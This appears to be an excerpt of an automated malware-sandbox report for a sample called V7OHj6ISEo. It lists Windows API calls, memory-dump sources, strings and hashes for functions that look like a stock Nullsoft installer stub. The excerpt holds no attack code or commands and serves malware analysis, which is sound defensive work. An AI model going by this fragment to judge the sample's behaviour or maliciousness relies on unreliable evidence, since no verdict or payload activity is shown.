                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 184305955-3251261122
                                                                                                            • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,771B3420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1425696872
                                                                                                            • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: N
                                                                                                            • API String ID: 3103080414-1130791706
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A
                                                                                                            • API String ID: 2624150263-3645020878
                                                                                                            • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            • soft, xrefs: 00403020
                                                                                                            • Error launching installer, xrefs: 00402F80
                                                                                                            • Null, xrefs: 00403029
                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                            • Inst, xrefs: 00403017
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-787788815
                                                                                                            • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-730719616
                                                                                                            • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
